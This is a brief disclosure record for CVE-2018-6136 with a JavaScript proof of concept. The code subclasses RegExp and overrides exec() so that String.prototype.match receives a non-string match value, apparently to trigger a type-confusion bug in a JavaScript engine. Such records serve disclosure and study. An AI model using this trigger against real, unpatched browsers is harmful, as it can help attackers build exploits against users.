CVE-2018-6136

  • Report: Apr 2018
  • Fix: Apr 2018
  • Credit: Peter Wong

PoC

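// Subclass RegExp so the built-in match path calls a user-defined exec()
class MyRegExp extends RegExp {
  exec(str) {
    // Get a genuine match result from the built-in exec()
    const r = super.exec.call(this, str);
    // Replace the matched string with a non-string value
    r[0] = 0; // Value could be changed to something arbitrary
    return r;
  }
}

// With the 'g' flag, String.prototype.match() calls the overridden exec()
'a'.match(new MyRegExp('.', 'g'));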

Reference